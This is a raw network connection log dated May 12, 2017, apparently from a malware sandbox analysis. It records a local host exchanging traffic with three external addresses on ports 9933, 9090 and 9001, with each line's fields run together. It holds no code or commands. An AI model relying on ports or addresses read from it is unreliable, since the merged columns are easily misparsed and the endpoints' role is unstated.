May 12, 2017 18:54:54.678838968 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.678848982 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679143906 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:54.679168940 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:54.679287910 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:54.679301023 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:54.679511070 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.679524899 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679536104 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679543018 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679548979 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679555893 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679562092 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679569006 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679574966 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679580927 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679588079 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679594994 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679600954 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679606915 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679613113 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679620028 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679625988 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679631948 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679639101 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679646969 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679652929 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679658890 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679811001 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.679831028 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679841042 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679847002 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679852962 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679860115 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679866076 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679872990 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679878950 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679886103 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679949045 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679975986 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.679995060 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.680010080 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.680022955 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.680037022 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.680047989 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.680061102 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.680074930 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.680085897 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.680099010 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.680111885 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.681442976 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:54.681459904 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:54.681596041 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.681613922 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.681623936 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.681632996 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.681853056 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.682534933 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.682614088 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.684576988 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.685017109 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.685036898 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.732307911 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.732333899 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.732352018 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.732714891 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.741570950 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.741596937 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.741606951 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.741731882 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.743576050 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.743606091 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.743622065 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.743709087 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.749336004 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.749363899 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.749700069 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.749718904 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.750797033 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.750821114 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.750920057 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.750935078 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.759996891 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.760011911 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.760210037 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.760237932 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.772469997 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.772494078 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.772598028 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.772613049 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.772627115 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.773003101 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.773026943 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.786807060 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.786824942 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.786837101 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.787076950 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.787102938 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.795414925 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.795447111 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.795591116 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.795614958 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.802195072 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.802229881 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.802303076 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.802323103 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.811480999 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.811511040 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.811806917 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.811826944 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.820218086 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.820238113 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.820327044 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.820349932 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.820655107 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.820668936 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.820871115 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.820890903 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.833436012 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.833456039 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.833730936 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.833754063 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.836469889 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.836484909 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.838824034 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.838852882 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.842475891 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:54.846822023 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.846853971 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.847103119 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.847136021 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.855978012 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.856013060 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.856136084 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.856184006 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.874495029 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.874526024 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.874675035 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.874692917 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.874705076 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.874903917 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.874933958 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.901935101 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.901967049 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.901984930 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.902085066 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.902111053 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.903139114 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.903166056 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.903306007 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.903326988 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.912405968 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.912467957 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.912533998 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.912554026 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.912992954 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.913070917 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.928857088 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.928884983 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.928898096 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.928967953 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.934266090 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.934292078 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.934304953 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.934585094 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.936000109 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.936023951 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.936045885 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.936275959 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.946844101 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.946866035 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.946882010 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.946937084 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.962415934 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.962451935 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.962807894 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.962830067 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.965831995 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.965873957 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.965944052 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.965961933 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.970786095 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.970807076 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.971205950 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.971223116 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.975680113 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.975706100 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.975774050 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.975795031 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.992410898 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.992424965 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.992585897 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.992607117 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.993674994 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.993694067 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:54.993808031 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:54.993830919 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.001848936 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.001873970 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.001981020 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:55.002002001 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.007855892 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.007880926 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.007972002 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:55.007992983 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.011805058 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.011828899 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.011899948 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:55.011919975 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.026295900 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.026323080 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.026343107 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.026431084 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:55.026453018 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.029561043 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.029584885 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.029705048 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:55.029725075 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.038958073 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.038981915 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.039066076 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:55.039088011 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.042819023 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:55.046211004 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.046235085 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.046390057 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:55.046405077 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.048495054 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.048521996 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.048744917 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:55.048758030 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.061341047 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.061367035 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.061470032 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:54:55.061485052 CEST99349199195.154.107.23192.168.1.16
May 12, 2017 18:54:55.137875080 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.137900114 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.137913942 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.137942076 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:54:55.138005018 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:55.142318010 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.142349005 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.142362118 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.142469883 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:55.142472982 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.142488003 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.142503977 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.142587900 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.142782927 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.142801046 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.142878056 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:55.142895937 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.142913103 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.142935991 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.144529104 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:55.144546032 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.147186041 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.147233009 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.147247076 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.147259951 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.147291899 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.147315979 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:55.147331953 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.147372961 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.147481918 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.147497892 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.147744894 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.147763968 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.147845030 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:55.147877932 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.147880077 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:55.147891045 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.147900105 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:55.147910118 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.147954941 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:55.148936987 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:55.151556015 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.151576996 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.151586056 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.151674032 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:55.152616978 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.152640104 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.152759075 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:55.153572083 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.153590918 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.153603077 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.153666019 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:54:55.154634953 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:54:55.154652119 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.710551023 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.710555077 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.711618900 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.711643934 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.711654902 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.711661100 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.711666107 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.711673021 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.711678028 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.712130070 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.712146997 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.712156057 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.712162971 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.712172031 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.712176085 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.712182045 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.712523937 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.712541103 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.712549925 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.712557077 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.712565899 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.712570906 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.712577105 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.712769985 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.712785006 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.712793112 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.712799072 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.712804079 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.712810040 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.712816000 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.714137077 CEST49199993192.168.1.16195.154.107.23
May 12, 2017 18:55:03.714235067 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.714252949 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.714263916 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.714270115 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.714276075 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.714282990 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.714288950 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.715537071 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.715634108 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.716232061 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.716253996 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.718453884 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.718491077 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.718503952 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.718509912 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.718517065 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.718602896 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.718810081 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.718825102 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.719307899 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.719321966 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719331026 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719336987 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719342947 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719348907 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719355106 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719361067 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719367027 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719372034 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719449997 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.719464064 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719471931 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719477892 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719484091 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719490051 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719495058 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719500065 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719506025 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719511032 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719516993 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719661951 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.719675064 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.719682932 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.719688892 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.719772100 CEST492009090192.168.1.16138.68.0.4
May 12, 2017 18:55:03.719786882 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719794989 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719800949 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719806910 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719813108 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719818115 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719824076 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719829082 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719835043 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719840050 CEST909049200138.68.0.4192.168.1.16
May 12, 2017 18:55:03.719861031 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.720597982 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:03.720614910 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.720624924 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.720630884 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.720637083 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.720642090 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.720647097 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:03.720747948 CEST492009090192.168.1.16138.68.0.4
